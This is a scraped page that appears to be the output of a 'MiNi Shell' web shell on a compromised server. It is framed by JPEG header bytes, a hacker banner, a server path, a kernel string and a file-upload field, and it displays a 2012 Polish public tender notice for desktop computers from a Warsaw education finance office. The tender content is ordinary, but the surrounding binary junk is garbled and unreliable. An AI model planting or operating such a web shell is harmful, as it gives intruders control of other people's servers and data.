JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121025/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121025/417916-N-2012.html

<p class="kh_header"><b>Warszawa: Dostawa artykułów komputerowych dla Miejskiego Biura Finansów Oświaty m. st. Warszawy.</b><br>
<b>Numer ogłoszenia: 417916 - 2012; data zamieszczenia: 25.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Biuro Finansów Oświaty m. st. Warszawy , ul. Mokotowska 55, 00-542 Warszawa, woj. mazowieckie, tel. 022 6969015, faks 022 6213045.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mbfo.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów komputerowych dla Miejskiego Biura Finansów Oświaty m. st. Warszawy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: 
Komputer - 5szt.

Typ obudowy komputera	Mini Tower
Ilość zainstalowanych procesorów	1 szt.
Maksymalna ilość procesorów	1 szt.
Technologia wykonania procesora	32 nm
Liczba rdzeni procesora	2
Częstotliwość procesora	3,3 GHz
Pojemność pamięci cache [L2]	3 MB
Ilość zainstalowanych dysków	1 szt.
Maksymalna ilość dysków	2 szt.
Pojemność zainstalowanego dysku	500 GB
Typ zainstalowanego dysku	SATA III
Zainstalowane sterowniki dysków	4 x SATA III
Pojemność zainstalowanej pamięci	8192 MB
Rodzaj zainstalowanej pamięci	DDR3
Typ pamięci	Non-ECC
Częstotliwość szyny pamięci 	1600 MHz
Ilość banków pamięci	2 szt.
Ilość wolnych banków pamięci	2 szt.
Zintegrowana karta graficzna 	Tak
Zintegrowana karta dźwiękowa 	Tak
Zintegrowana karta sieciowa 	Tak
Typ zintegrowanej karty sieciowej 	10/100/1000 Mbit/s
Ilość slotów PCI-E 1x	1 szt.
Ilość wolnych slotów PCI 	1 szt.
Ilość slotów PCI-E 16x 	1 szt.
Ilość wolnych slotów PCI-E 16x 	1 szt.
 Interfejsy
 
 
 
  
 
 
 	1 x 15-stykowe D-Sub (wyjście na monitor)
	1 x DVI (wyjście na monitor)
	4 x USB 2.0
	1 x USB 3.0
	1 x RJ-45 (LAN)
	1 x PS/2 (klawiatura)/(mysz)
	3 x  gniazdo audio
Napędy wbudowane (zainstalowane)	DVD?RW
Moc zasilacza (zasilaczy) 	300 Wat z aktywnym PFC, o sprawności 90% umożliwiający bezproblemową pracę komputera przy pełnym wyposażeniu w dodatkowe urządzenia podpięte poprzez porty i sloty rozszerzeń, przy pełnym obciążeniu
System operacyjny 	Microsoft Windows 7 Professional PL 64-bit, nie wymagający aktywacji przez Internet, dołączone płyty ze sterownikami dla Windows 7 Professional, Windows XP Professional

Powyższe parametry są wartościami minimalnymi.
System oraz oprogramowanie muszą być zainstalowane na każdym komputerze. 
Wszystkie komponenty muszą być objęte gwarancją producenta.

2.	Zamawiający dopuszcza składanie ofert na sprzęt równoważny; przez ofertę równoważną rozumie się dostawę artykułów komputerowych o parametrach nie gorszych niż określone przez zamawiającego. Zamawiający dopuszcza możliwość zakupu programów równoważnych 
do programów wskazanych w pkt II.1 SIWZ . Za równoważny program należy uznać program 
o takich samych lub lepszych parametrach i który jest kompatybilny ze wszystkimi programami 
i platformami co program wskazany. Oferowane Zamawiającemu równoważne oprogramowania 
i systemy muszą być dostosowane do aktualnej infrastruktury informatycznej Zamawiającego 
i nie mogą powodować konieczności jej przebudowania bądź powiększenia.

3.	Oferowany sprzęt wyszczególniony w pozostałych częściach zamówienia musi być fabrycznie nowy, objęty co najmniej 36 miesięczną gwarancją z zapewnieniem producenta 
o międzynarodowych uprawnieniach gwarancyjnych poza granicami Polski. Dostarczone urządzenia muszą posiadać karty gwarancyjne wydane przez producenta urządzenia.

4.	Wszelkie koszty związane z wykonywaniem obowiązków gwarancyjnych ponosi Wykonawca.

5.	Strony ustalają, że naprawy będą dokonywane w zależności od potrzeb, w miejscu wskazanym przez Wykonawcę. Ewentualne dostarczenie sprzętu do punktu napraw obciąża kosztami Wykonawcę.

6.	Zamawiający wymaga, by czas naprawy sprzętu nie przekraczał 2 dni roboczych. Przekraczając ten termin Wykonawca jest obowiązany dostarczyć sprzęt zastępczy (odpowiadający parametrom technicznym wymienianego sprzętu). Naprawa sprzętu trwająca dłużej 
niż 31 dni kalendarzowych będzie się wiązała z obowiązkiem wymiany sprzętu przez Wykonawcę na nowy.

7.	Przedmiot zamówienia zostanie dostarczony do Miejskiego Biura Finansów Oświaty 
m. st. Warszawy ul. Mokotowska 55, 00-542 Warszawa, do pomieszczenia wskazanego 
przez osobę nadzorującą umowę ze strony Zamawiającego. 

8.	Oferowany sprzęt musi być fabrycznie nowy, najwyższej jakości oraz musi posiadać europejski certyfikat zgodności CE, i spełniać wszelkie normy obowiązującego prawa dopuszczającego dany produkt do obrotu, a w przypadku komputerów certyfikat zgodności z normą 
Energy Star 5.0.

9.	Zapewnia sprzęt zastępczy o parametrach nie gorszych niż uszkodzony sprzęt na okres naprawy dłuższy niż 2 (dwa) dni.

10.	Wykonawca będzie odpowiedzialny względem Zamawiającego za to, że jest uprawniony 
do wprowadzenia do obrotu oprogramowania wchodzącego w skład zamówienia  oraz za to, 
że Zamawiający wskutek zawarcia umowy będzie upoważniony do korzystania w ramach zwykłego użytku ze wszelkiego oprogramowania dostarczonego wraz ze sprzętem.

11. Wykonawca przekaże wraz ze sprzętem szczegółowe instrukcje obsługi (w języku polskim) 
dla każdej właściwej jednostki dostarczonego sprzętu.

12. Wspólny Słownik Zamówień CPV:
	
30213100-6 	30237000-9 

13. Zamawiający nie dopuszcza możliwości składania ofert częściowych.
14. Zamawiający nie dopuszcza możliwości złożenia oferty przewidującej odmienny niż określony
 w niniejszej SIWZ sposób wykonania zamówienia (oferty wariantowej).
15. Zamawiający informuje, iż dopuszcza możliwość zamówień uzupełniających, o których mowa 
 w art. 67 ust. 1, pkt 7 pzp. 
16. Zamawiający dopuszcza możliwość zmiany umowy na podstawie art. 144 pzp poprzez wydłużenie terminu realizacji umowy w sytuacji, w której wykonawca z obiektywnych przyczyn 
nie jest w stanie wykonać zamówienia w terminie pierwotnie wskazanym w umowie, 
zaś nie można było tego przewidzieć w chwili podpisywania umowy.
17. Cena jednostkowa brutto jakiegokolwiek urządzenia nie może przekraczać kwoty 3 500 zł..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający informuje, iż dopuszcza możliwość zamówień uzupełniających, o których mowa w art. 67 ust. 1, pkt 7 pzp</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6, 30.23.70.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunków zostanie przeprowadzona zgodnie z formułą spełnia - nie spełnia, 
w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty zgodnie 
ze szczegółowym opisem rodzajów dokumentów i oświadczeń zawartym w V rozdziale do SIWZ. 
Z treści załączonych dokumentów musi jednoznacznie wynikać, iż ww. warunki Wykonawca spełnił. 
Niespełnienie chociażby jednego z ww. warunków skutkować będzie wykluczeniem Wykonawcy 
z postępowania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wypełniony i podpisany wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw w okresie ostatnich 3 lat przed dniem wszczęcia postępowania 
o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, 
z podaniem ich wartości, przedmiotu, data wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te dostawy zostały wykonane należycie (załącznik nr 3) - należy podać 
co najmniej 3 dostawy artykułów komputerowych o wartości nie niższej niż 10 000,00 zł brutto każda.
Ocena spełniania ww. warunków zostanie przeprowadzona zgodnie z formułą spełnia - nie spełnia, 
w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty zgodnie 
ze szczegółowym opisem rodzajów dokumentów i oświadczeń zawartym w V rozdziale do SIWZ. 
Z treści załączonych dokumentów musi jednoznacznie wynikać, iż ww. warunki Wykonawca spełnił. 
Niespełnienie chociażby jednego z ww. warunków skutkować będzie wykluczeniem Wykonawcy 
z postępowania</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji winien przedstawić zobowiązanie tych podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia wg wzoru stanowiącego załącznik nr 5 do SIWZ.Ocena spełniania ww. warunków zostanie przeprowadzona zgodnie z formułą spełnia - nie spełnia, 
w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty zgodnie 
ze szczegółowym opisem rodzajów dokumentów i oświadczeń zawartym w V rozdziale do SIWZ. 
Z treści załączonych dokumentów musi jednoznacznie wynikać, iż ww. warunki Wykonawca spełnił. 
Niespełnienie chociażby jednego z ww. warunków skutkować będzie wykluczeniem Wykonawcy 
z postępowania</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Polisa wraz z dowodem jej opłacenia, a w przypadku jej braku inny dokument potwierdzający, 
że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na kwotę nie niższą niż 10 000,00 zł ważna na cały okres realizacji niniejszego zamówienia, a w przypadku, gdy ważność polisy jest krótsza, niż okres realizacji niniejszego zamówienia, oświadczenie Wykonawcy zapewniające o kontynuowaniu ubezpieczenia zgodnie 
z okresem realizacji niniejszego zamówienia.
Ocena spełniania ww. warunków zostanie przeprowadzona zgodnie z formułą spełnia - nie spełnia, 
w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty zgodnie 
ze szczegółowym opisem rodzajów dokumentów i oświadczeń zawartym w V rozdziale do SIWZ. 
Z treści załączonych dokumentów musi jednoznacznie wynikać, iż ww. warunki Wykonawca spełnił. 
Niespełnienie chociażby jednego z ww. warunków skutkować będzie wykluczeniem Wykonawcy 
z postępowania</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umowy na podstawie art. 144 pzp poprzez wydłużenie terminu realizacji umowy w sytuacji, w której wykonawca z obiektywnych przyczyn 
nie jest w stanie wykonać zamówienia w terminie pierwotnie wskazanym w umowie, 
zaś nie można było tego przewidzieć w chwili podpisywania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mbfo.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Biuro Finansów Oświaty m. st. Warszawy ul. Mokotowska 55, 00-542 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.11.2012 godzina 09:00, miejsce: Miejskie Biuro Finansów Oświaty m. st. Warszawy ul. Mokotowska 55, 00-542 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com